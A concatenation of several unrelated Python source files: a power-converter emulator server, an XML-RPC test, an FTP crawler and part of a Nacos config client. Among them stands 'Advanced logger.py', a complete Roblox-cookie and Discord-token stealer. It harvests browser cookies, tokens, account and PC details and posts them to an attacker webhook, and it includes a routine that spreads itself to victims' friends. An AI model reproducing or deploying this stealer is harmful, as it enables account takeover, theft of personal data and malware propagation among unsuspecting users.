if conf.debug: logger.debug("no need to ramp up")
core.rampUp(dvg,currentBusVoltage,0)
else :
if conf.debug: logger.debug("need to ramp up")
interval=120/float(gl.acc)
t = threading.Thread(target=core.rampUp, args=(dvg,currentBusVoltage,interval,), name="rampUp")
t.start()
# else simulate power transfer: update all other dcdc meter readers directly
else:
core.simulateMeter()
# return gl.oesunits[oesid]["dcdc"]
return convert_dcdc_(gl.oesunits.get(oesid, {}).get('dcdc', {}))
@route('/set/dcdc/voltage/<oesid>', method='GET')
def setDcdcVoltage(oesid):
while gl.sema :
time.sleep(0.01)
gl.sema=True
dvg = helper.convert(request.query.dvg)
drg=None
if "drg" in dict(request.query):
drg = float(helper.convert(request.query.drg))
else:
drg = gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]
logger.debug("setting voltage oesunit "+oesid+ "dvg="+dvg)
status = gl.oesunits[oesid]["dcdc"]["status"]["status"]
if len(dvg)<1:# :or status != "0x0014":
logger.warning("incorrect request ")#(emulator only allows this command for status=0x0014)")
return None
dvg=int(float(dvg))
gl.oesunits[oesid]["dcdc"]["vdis"]["dvg"]=float(dvg)
gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]=float(drg)
gl.sema=False
currentBusVoltage=int(gl.oesunits[oesid]["dcdc"]["meter"]["vg"])
# if voltage is not yet high, gradually ramp up
if status=="0x0014" and currentBusVoltage!= dvg :
logger.debug("need to ramp up")
interval=120/float(gl.acc)
t = threading.Thread(target=core.rampUp, args=(dvg,currentBusVoltage,interval,), name="rampUp")
t.start()
# else simulate power transfer: update all other dcdc meter readers directly
else:
core.simulateMeter()
# return {"meter":gl.oesunits[oesid]["dcdc"]["meter"],"vdis":gl.oesunits[oesid]["dcdc"]["vdis"]}
dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
result = {}
if dcdc.get('meter') is not None: result['meter'] = convert_dcdc_meter_(dcdc['meter'])
if dcdc.get('vdis') is not None: result['vdis'] = convert_dcdc_vdis_(dcdc['vdis'])
return result
@route('/set/dcdc/current/<oesid>', method='GET')
def setDcdcCurrent(oesid):
while gl.sema :
time.sleep(0.01)
gl.sema=True
dig = helper.convert(request.query.dig)
logger.debug("setting current oesunit "+oesid+ "dig="+dig)
#status = gl.oesunits[oesid]["dcdc"]["status"]["status"]
if len(dig)<1 :
logger.warning("incorrect request")
return None
#if (status=="0x0000" or status=="0x0014" ):
# logger.warning("incorrect request (emulator only allows this command for status=0x0002 or 0x0041)")
# return None
gl.oesunits[oesid]["dcdc"]["param"]["dig"]=float(dig)
gl.sema=False
core.simulateMeter()
# return {"meter":gl.oesunits[oesid]["dcdc"]["meter"],"param":gl.oesunits[oesid]["dcdc"]["param"]}
dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
result = {}
if dcdc.get('meter') is not None: result['meter'] = convert_dcdc_meter_(dcdc['meter'])
if dcdc.get('param') is not None: result['param'] = convert_dcdc_param_(dcdc['param'])
return result
#####
# resources
#####
@route('/js/<filename>')
def js_static(filename):
return static_file(filename, root='./js')
@route('/img/<filename>')
def img_static(filename):
return static_file(filename, root='./img')
@route('/css/<filename>')
def img_static_css(filename):
return static_file(filename, root='./css')
#Static Files
@route('/static/<filepath:path>')
def static(filepath):
return static_file(filepath, root="./static")
########################################
### init functions
########################################
def initializeOESUnits(args):
if len(args)>=1:
addNUnits(int(args[0]))
else:
addNUnits(len(gl.displayNames))
#else :
# getInitJsonFile()
def addNUnits(n):
for i in range(n) :
addUnit()
logger.debug("starting off with "+str(n)+ " units.")
def startWebServer():
run(host=conf.b_host, port=conf.b_port, quiet=False, reloader=False)
def main(args):
try:
if conf.doUpdates :
gl.inData = inputDataManager(conf.dataSet)
initializeOESUnits(args)
t = threading.Thread(target=startWebServer, name="tornado")
t.daemon = True
t.start()
time.sleep(1)
logging.getLogger("tornado.access").setLevel(logging.WARN)
core.updatePowerFlow()
logger.debug("emulator has finished, stop tornado too")
gl.analyserObject.writeToCSV()
t.kill_received = True
else:
gl.acc=1
initializeOESUnits(args)
startWebServer()
except KeyboardInterrupt:
logger.info( "Ctrl-c received! Sending kill to threads...")
gl.analyserObject.writeToCSV()
t.kill_received = True
#except :
# logger.info( "error happened" + str(sys.exc_info()[:2] ))
# t.kill_received = True
if __name__ == "__main__":
logging.config.fileConfig("config/logger.conf",disable_existing_loggers=False)
logger = logging.getLogger(__name__)
#disable logging of http requests
logging.getLogger("requests").setLevel(logging.WARN)
main(sys.argv[1:])
|
test_xmlrpc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import xmlrpclib
from expects import *
from threading import Thread
from werkzeug_xmlrpc import WSGIXMLRPCApplication
class BasicTestMethods(unittest.TestCase):
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 3423
DEFAULT_URI = 'http://' + DEFAULT_HOST + ':' + str(DEFAULT_PORT)
@staticmethod
def make_server(host=DEFAULT_HOST, port=DEFAULT_PORT):
def test_1():
return 'test_1_response'
class Test2(object):
def test_3(self, obj):
return obj
test = Test2()
application = WSGIXMLRPCApplication(
instance=test, methods=[test_1]
)
from wsgiref import simple_server
server = simple_server.make_server(host, port, application)
return server
@staticmethod
def make_client(uri=DEFAULT_URI):
return xmlrpclib.ServerProxy(uri)
def setUp(self):
self.server = self.make_server()
self.thread = Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.server.server_close()
class TestXMLRPC(BasicTestMethods):
def test_xmlrpc_server(self):
client = self.make_client()
expect(client.test_1()).to(equal('test_1_response'))
expect(client.test_3({'trial dict': 4})).to(equal({'trial dict': 4}))
|
Advanced logger.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
import browser_cookie3, requests, threading
import base64
import time
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
key = "ENCODED BASE32 HOOK HEREEEE"
webhook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Logger",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("PASTE WEBHOOOOK", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
walk_ftp.py | import os
from dateutil import parser
import pickle
import warnings
import pandas as pd
import numpy as np
import datetime as dt
from time import sleep
import multiprocessing as mp
from threading import Thread
import tempfile
from ftplib import FTP
from logging import log
warnings.filterwarnings('ignore')
class WalkFTP:
def list_path(self, x):
try:
return self._ftp.nlst(x)
except:
sleep(60)
self.connect_ftp()
return self._ftp.nlst(x)
def check_in_log(self, f, stat_mtime):
'''
return True if run ftp download
'''
log = self.log_data
if log == {}:
return True
log_file_entry = log.get(f, {})
if log_file_entry == {}:
self.class_print('log empty for {} - glob ftp. Running Normal'.format(f))
return True
else:
# check if successful get
if log_file_entry.get('get', False):
# successful get
if log_file_entry.get('mtime') == stat_mtime:
# successful mtim
if callable(self.processing_function):
# is a process
if log_file_entry.get('process', False):
self.class_print('Not pulling {} - it is in the log'.format(f))
return False
else:
self.class_print('pulling {} - did not process correctly'.format(f))
return True
else:
self.class_print('Not pulling {} - it is in the log'.format(f))
return False
else:
self.class_print('mtime does not match for {} log: {} current: {}'.format(
f, log_file_entry.get('mtime'), stat_mtime
))
return True
else:
self.class_print('ftp get did not work {}'.format(f))
return True
def glob_ftp(self, store_paths = ''):
if self._glob_count > self.args.get('break_count', np.inf):
return None
for new_fp_or_file in self.list_path(store_paths):
#new_fp_or_file = os.path.join(store_paths, f)
stat_bool, stat_mtime = self.test_file(new_fp_or_file)
if stat_bool:
stat_mtime = str(stat_mtime)
date_filter = (pd.to_datetime(stat_mtime) >= pd.to_datetime(self.start_date)) and (pd.to_datetime(stat_mtime) <= pd.to_datetime(self.end_date) )
if date_filter and self.check_in_log(new_fp_or_file, stat_mtime):
self.class_print('{} {} {}'.format(stat_mtime, new_fp_or_file, date_filter))
self._glob_count+=1
self.q.put(new_fp_or_file)
else:
pass
self.class_print(f'{new_fp_or_file} date_filter: {date_filter} stat_mtime: {stat_mtime}')
if self._glob_count > self.args.get('break_count', np.inf):
self.class_print('publishing glob break')
self.q.put('break')
return None
else:
self.class_print(f'STAT BOOL FALSE {new_fp_or_file}')
block = False
for b in self.blocks:
if b in new_fp_or_file:
block=True
break
if not block:
self.glob_ftp(new_fp_or_file)
if store_paths == self.orig_store_paths:
self.class_print('publishing glob break')
self.q.put('break')
def test_file(self, f):
try:
nlist = self._ftp.nlst(f)
except:
return False, None
if nlist == [] or nlist[0]==f:
mtime = self.extract_modified_time(f)
return True, mtime
else:
#self.class_print(f'{f} {nlist}')
return False, None
def store_all_ftp(self):
break_count = self.args.get('break_count',np.inf)
count=0
while True:
fp = self.q.get()
if isinstance(fp, str) and fp == 'break' or (count>break_count):
self.class_print('publishing process break')
self.process_q.put(('break', 'break'))
break
elif fp is None:
sleep(1)
elif isinstance(fp, str):
count+=1
self.class_print('storing: {}'.format(fp))
self.store_ftp(fp)
self.class_print('.........')
self.class_print('finished get function')
def store_ftp(self, fp):
store_path = os.path.join(self._output_path, os.path.dirname(fp))
store_file = os.path.join(self._output_path, fp)
if not os.path.exists(store_path):
os.makedirs(store_path)
if not os.path.exists(store_file):
try:
self.get(fp, store_file)
except Exception as e:
print('ERROR ON: {} {}'.format(fp, store_file))
print(e)
def exit_q(self):
self.process_q.put(('break', 'break'))
self.q.put('break')
self.cleanup()
def connect_ftp(self, returns=False):
ftp = FTP(self._base_url)
max_try_count = 2
count = 0
while count<max_try_count:
count+=1
try:
if not returns: self.class_print('logging into ftp')
if self._username is None and self._password is None:
mg = ftp.login(user=self._username, passwd=self._password)
if not returns: self.class_print(msg)
else:
msg = ftp.login(user=self._username, passwd=self._password)
if not returns: self.class_print(msg)
break
except:
sleep(30)
if returns:
return ftp
else:
self._ftp = ftp
def cleanup(self):
self._ftp.close()
if self.close_temporary_directory:
self.tmpdir.cleanup()
def extract_modified_time(self, remotepath):
ftp = self.connect_ftp(returns=True)
ts = None
try:
ts = ftp.voidcmd('MDTM '+remotepath)
ts = ts[4:].strip()
ts = parser.parse(ts)
ts = pd.to_datetime(ts)
return ts
# return ts
except Exception as e:
self.class_print(f'{remotepath} {e}')
return ''
assert False, f'{ts} {remotepath}'
# if '.' in remotepath:
# print(e)
# return None
def get(self, remotepath, file):
count=0
successful_get = False
ftp = self._ftp
start_time = pd.datetime.now()
for i in range(0,2):
#self.connect_ftp()
self.class_print(f'starting store get {remotepath}')
try:
stat_mtime = self.extract_modified_time(remotepath)
gFile = open(file, 'wb')
self.class_print('reading: {}'.format(remotepath))
ftp.retrbinary('RETR '+remotepath, gFile.write, blocksize=self._blocksize)
self.class_print(f'finished _s get {remotepath}')
successful_get=True
self.add_log(remotepath,'get',successful_get)
self.add_log(remotepath,'mtime', stat_mtime)
#self.add_log(remotepath, 'stat', stat)
break
except Exception as e:
self.class_print(remotepath)
self.class_print(e)
self.connect_ftp()
ftp = self._ftp
if count > 0: ftp.close()
if not successful_get and os.path.exists(file): os.remove(file)
assert successful_get, '{} failed'.format(file)
self.class_print('successful ftp pull {} seconds'.format( int((pd.datetime.now()-start_time).total_seconds()) ))
if callable(self.processing_function):
self.process_q.put((file, remotepath))
def class_print(self, msg):
if self.print_out:
print(pd.datetime.today().strftime('%Y-%m-%d %H:%M:%S')+' '+str(msg))
def main(self):
self.q = mp.Queue()
self.process_q = mp.Queue()
self.connect_ftp()
glob_thread = Thread(target=self.glob_ftp, name = 'glob')
glob_thread.start()
store_thread = Thread(target=self.store_all_ftp, name='store')
store_thread.start()
if callable(self.processing_function):
process_thread = Thread(target=self.process_all_ftp, name='process')
process_thread.start()
while True:
if self.join_threads:
self.class_print('joining glob thread')
glob_thread.join()
self.class_print('joining store thread')
store_thread.join()
if callable(self.processing_function):
self.class_print('joining process thread')
process_thread.join()
break
#self.class_print('END ---- did not join threads ')
def process_all_ftp(self):
break_count = self.args.get('break_count',np.inf)
count=0
while True:
fname = self.process_q.get()
self.class_print('process all ftp finished get {}'.format(fname))
if fname is None:
self.class_print('SLEEPING')
sleep(1)
elif isinstance(fname[0], str) and fname[0] != 'break':
count+=1
successful_process = self.processing_function(fname[0])
self.add_log(fname[1], 'process', successful_process)
self.class_print(f'process count is {count}')
elif (isinstance(fname[0], str) and fname[0] == 'break') or (count>break_count):
self.class_print('JOINING THREADS')
self.join_threads = True
return None
def write_log(self):
fp = self.log
if not os.path.exists(os.path.dirname(fp)):
os.makedirs(os.path.dirname(fp))
if ready: self.log_data['_ready'] = True
pickle.dump(self.log_data, open(self.log, mode='wb'))
def add_log(self, fp, key, value):
if not fp in self.log_data:
self.log_data[fp] = {}
self.log_data[fp][key] = value
def read_log(self):
if self.log is None:
self.log_data = {}
elif os.path.exists(self.log):
first = True
while True:
self.log_data = pickle.load(open(self.log, mode='rb'))
if self._force or self.log_data.get('_ready', True):
# this section prevents other FTPs from downloading while this one is running so your log is not double written
self.log_data['_ready'] = False
self.write_log()
break
else:
if first:
first = False
self.class_print('sleeping ftp in process of running')
sleep(60)
else:
self.log_data = {}
self.class_print('finished reading log')
def __init__(
self,
base_url,
username=None,
password=None,
port=21,
store=None,
processing_function=None,
log=None,
blocks=[],
start_date = pd.to_datetime('1970-01-01'),
end_date = pd.datetime.today()+dt.timedelta(1),
blocksize=8192,
**args,
):
'''
Parameters
----------
base_url : str
URL that you are pulling the ftp
username : str
Username to login to the ftp
password : str
Username to login to the ftp
port : int
port
store : None, str
Path after to store files. If None, then
stores in a temporary directory. Use with
1) processing_function argument to get
data from them and a log filepath to keep
track of files already downloaded
processing_function : None/function
pass function if you want to process the
data after ftp pull. Takes teh filepath as an
argument. Returns True/False depending on whether
the process ran correctly
log : str
filepath of log to get information on data.
This can be used for a temporary directory
in order to not keep the files stored but
know that the data is processed. Should be
a .p file
blocks : list
list of str to block. Looks for string
in file path of each entry in blocks
to determine whether to pull
start_date : str/datetime
date to only pull files that were modified after
this date - default 1970-01-01
Optional Args
-------------
print_out : bool
Whether to print out messages (slower when True)
break_count : int
stop running ftp download after n number of files downloaded
force : bool
force to overwrite log that is in progress
'''
self.args=args
self._glob_count=0
print_out = args.get('print_out', False)
self._force = args.get('force', False)
if isinstance(blocks, str):
blocks = [blocks]
self.blocks = blocks
self.print_out = print_out
if not store is None:
self.class_print(f'store is not None: {store}')
self._output_path = store
self.close_temporary_directory = False
else:
self.close_temporary_directory = True
self.tmpdir = tempfile.TemporaryDirectory()
self._output_path = self.tmpdir.name
self.class_print(f'temporary directory {self._output_path}')
self._blocksize = blocksize
self.log = log
self.read_log()
self.join_threads = False
self._username = username
self._password = password
self._port=port
self._base_url = base_url
self.processing_function = processing_function
self.file_list = []
self.orig_store_paths = ''
self.start_date = pd.to_datetime(start_date)
self.end_date = pd.to_datetime(end_date)
self.run()
if log != None: self.write_log(ready=True)
def run(self):
self.main()
self.cleanup() |
client.py | #!/usr/local/bin/env python3
# -*- coding:utf-8 -*-
import base64
import hashlib
import logging
import socket
import json
import platform
import time
import hmac
try:
import ssl
except ImportError:
ssl = None
from multiprocessing import Process, Manager, Queue, pool
from threading import RLock, Thread
try:
# python3.6
from http import HTTPStatus
from urllib.request import Request, urlopen, ProxyHandler, HTTPSHandler, HTTPHandler, build_opener
from urllib.parse import urlencode, unquote_plus, quote
from urllib.error import HTTPError, URLError
except ImportError:
# python2.7
import httplib as HTTPStatus
from urllib2 import Request, urlopen, HTTPError, URLError, ProxyHandler, HTTPSHandler, build_opener
from urllib import urlencode, unquote_plus, quote
base64.encodebytes = base64.encodestring
from .commons import synchronized_with_attr, truncate, python_version_bellow
from .params import group_key, parse_key, is_valid
from .files import read_file_str, save_file, delete_file
from .exception import NacosException, NacosRequestException
from .listener import Event, SimpleListenerManager
from .timer import NacosTimer, NacosTimerManager
logging.basicConfig()
logger = logging.getLogger(__name__)
DEBUG = False
DEFAULT_GROUP_NAME = "DEFAULT_GROUP"
DEFAULT_NAMESPACE = ""
WORD_SEPARATOR = u'\x02'
LINE_SEPARATOR = u'\x01'
DEFAULTS = {
"APP_NAME": "Nacos-SDK-Python",
"TIMEOUT": 10, # in seconds
"PULLING_TIMEOUT": 30, # in seconds
"PULLING_CONFIG_SIZE": 3000,
"CALLBACK_THREAD_NUM": 10,
"FAILOVER_BASE": "nacos-data/data",
"SNAPSHOT_BASE": "nacos-data/snapshot",
}
OPTIONS = {"default_timeout", "pulling_timeout", "pulling_config_size", "callback_thread_num", "failover_base",
"snapshot_base", "no_snapshot", "proxies"}
def process_common_config_params(data_id, group):
if not group or not group.strip():
group = DEFAULT_GROUP_NAME
else:
group = group.strip()
if not data_id or not is_valid(data_id):
raise NacosException("Invalid dataId.")
if not is_valid(group):
raise NacosException("Invalid group.")
return data_id, group
def parse_pulling_result(result):
if not result:
return list()
ret = list()
for i in unquote_plus(result.decode()).split(LINE_SEPARATOR):
if not i.strip():
continue
sp = i.split(WORD_SEPARATOR)
if len(sp) < 3:
sp.append("")
ret.append(sp)
return ret
class WatcherWrap:
def __init__(self, key, callback, last_md5=None):
self.callback = callback
self.last_md5 = last_md5
self.watch_key = key
class CacheData:
def __init__(self, key, client):
self.key = key
local_value = read_file_str(client.failover_base, key) or read_file_str(client.snapshot_base, key)
self.content = local_value
self.md5 = hashlib.md5(local_value.encode("UTF-8")).hexdigest() if local_value else None
self.is_init = True
if not self.md5:
logger.debug("[init-cache] cache for %s does not have local value" % key)
class SubscribedLocalInstance(object):
def __init__(self, key, instance):
self.key = key
self.instance_id = instance["instanceId"]
self.md5 = NacosClient.get_md5(str(instance))
self.instance = instance
class SubscribedLocalManager(object):
def __init__(self):
self.manager = {
# "key1": {
# "LOCAL_INSTANCES": {
# "instanceId1": None,
# "instanceId2": None,
# "instanceId3": None,
# "instanceId4": None
# },
# "LISTENER_MANAGER": None
# },
# "key2": {
# "LOCAL_INSTANCES": {
# "instanceId1": "",
# "instanceId2": "",
# "instanceId3": "",
# "instanceId4": ""
# },
# "LISTENER_MANAGER": None
# }
}
def do_listener_launch(self, key, event, slc):
listener_manager = self.get_local_listener_manager(key)
if listener_manager and isinstance(listener_manager, SimpleListenerManager):
listener_manager.do_launch(event, slc)
def get_local_listener_manager(self, key):
key_node = self.manager.get(key)
if not key_node:
return None
return key_node.get("LISTENER_MANAGER")
def add_local_listener(self, key, listener_fn):
if not self.manager.get(key):
self.manager[key] = {}
local_listener_manager = self.manager.get(key).get("LISTENER_MANAGER")
if not local_listener_manager or not isinstance(local_listener_manager, SimpleListenerManager):
self.manager.get(key)["LISTENER_MANAGER"] = SimpleListenerManager()
local_listener_manager = self.manager.get(key).get("LISTENER_MANAGER")
if not local_listener_manager:
return self
if isinstance(listener_fn, list):
listener_fn = tuple(listener_fn)
local_listener_manager.add_listeners(*listener_fn)
if isinstance(listener_fn, tuple):
local_listener_manager.add_listeners(*listener_fn)
# just single listener function
else:
local_listener_manager.add_listener(listener_fn)
return self
def add_local_listener_manager(self, key, listener_manager):
key_node = self.manager.get(key)
if key_node is None:
key_node = {}
key_node["LISTENER_MANAGER"] = listener_manager
return self
def get_local_instances(self, key):
if not self.manager.get(key):
return None
return self.manager.get(key).get("LOCAL_INSTANCES")
def add_local_instance(self, slc):
if not self.manager.get(slc.key):
self.manager[slc.key] = {}
if not self.manager.get(slc.key).get('LOCAL_INSTANCES'):
self.manager.get(slc.key)['LOCAL_INSTANCES'] = {}
self.manager.get(slc.key)['LOCAL_INSTANCES'][slc.instance_id] = slc
return self
def remove_local_instance(self, slc):
key_node = self.manager.get(slc.key)
if not key_node:
return self
local_instances_node = key_node.get("LOCAL_INSTANCES")
if not local_instances_node:
return self
local_instance = local_instances_node.get(slc.instance_id)
if not local_instance:
return self
local_instances_node.pop(slc.instance_id)
return self
def parse_nacos_server_addr(server_addr):
sp = server_addr.split(":")
if len(sp) == 3:
return sp[0] + ":" + sp[1], int(sp[2])
else:
port = int(sp[1]) if len(sp) > 1 else 8848
return sp[0], port
class NacosClient:
debug = False
@staticmethod
def set_debugging():
if not NacosClient.debug:
global logger
logger = logging.getLogger("nacos")
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s:%(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
NacosClient.debug = True
@staticmethod
def get_md5(content):
return hashlib.md5(content.encode("UTF-8")).hexdigest() if content is not None else None
def __init__(self, server_addresses, endpoint=None, namespace=None, ak=None, sk=None, username=None, password=None, no_snapshot=False):
self.server_list = list()
try:
for server_addr in server_addresses.split(","):
self.server_list.append(parse_nacos_server_addr(server_addr.strip()))
except Exception as ex:
logger.exception("[init] bad server address for %s" % server_addresses)
raise ex
self.current_server = self.server_list[0]
self.endpoint = endpoint
self.namespace = namespace or DEFAULT_NAMESPACE or ""
self.ak = ak
self.sk = sk
self.username = username
self.password = password
self.server_list_lock = RLock()
self.server_offset = 0
self.watcher_mapping = dict()
self.subscribed_local_manager = SubscribedLocalManager()
self.subscribe_timer_manager = NacosTimerManager()
self.pulling_lock = RLock()
self.puller_mapping = None
self.notify_queue = None
self.callback_tread_pool = None
self.process_mgr = None
self.default_timeout = DEFAULTS["TIMEOUT"]
self.auth_enabled = self.ak and self.sk
self.cai_enabled = True
self.pulling_timeout = DEFAULTS["PULLING_TIMEOUT"]
self.pulling_config_size = DEFAULTS["PULLING_CONFIG_SIZE"]
self.callback_thread_num = DEFAULTS["CALLBACK_THREAD_NUM"]
self.failover_base = DEFAULTS["FAILOVER_BASE"]
self.snapshot_base = DEFAULTS["SNAPSHOT_BASE"]
self.no_snapshot = no_snapshot
self.proxies = None
logger.info("[client-init] endpoint:%s, tenant:%s" % (endpoint, namespace))
def set_options(self, **kwargs):
for k, v in kwargs.items():
if k not in OPTIONS:
logger.debug("[set_options] unknown option:%s, ignored" % k)
continue
logger.debug("[set_options] key:%s, value:%s" % (k, v))
setattr(self, k, v)
def change_server(self):
with self.server_list_lock:
self.server_offset = (self.server_offset + 1) % len(self.server_list)
self.current_server = self.server_list[self.server_offset]
def get_server(self):
logger.info("[get-server] use server:%s" % str(self.current_server))
return self.current_server
def remove_config(self, data_id, group, timeout=None):
data_id, group = process_common_config_params(data_id, group)
logger.info(
"[remove] data_id:%s, group:%s, namespace:%s, timeout:%s" % (data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/cs/configs", None, None, params,
timeout or self.default_timeout, "DELETE")
c = resp.read()
logger.info("[remove] remove group:%s, data_id:%s, server response:%s" % (
group, data_id, c))
return c == b"true"
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error(
"[remove] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
raise NacosException("Insufficient privilege.")
else:
logger.error("[remove] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
e.code, self.namespace, group, data_id))
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[remove] exception %s occur" % str(e))
raise
def publish_config(self, data_id, group, content, app_name=None, config_type=None, timeout=None):
if content is None:
raise NacosException("Can not publish none content, use remove instead.")
data_id, group = process_common_config_params(data_id, group)
if type(content) == bytes:
content = content.decode("UTF-8")
logger.info("[publish] data_id:%s, group:%s, namespace:%s, content:%s, timeout:%s" % (
data_id, group, self.namespace, truncate(content), timeout))
params = {
"dataId": data_id,
"group": group,
"content": content.encode("UTF-8"),
}
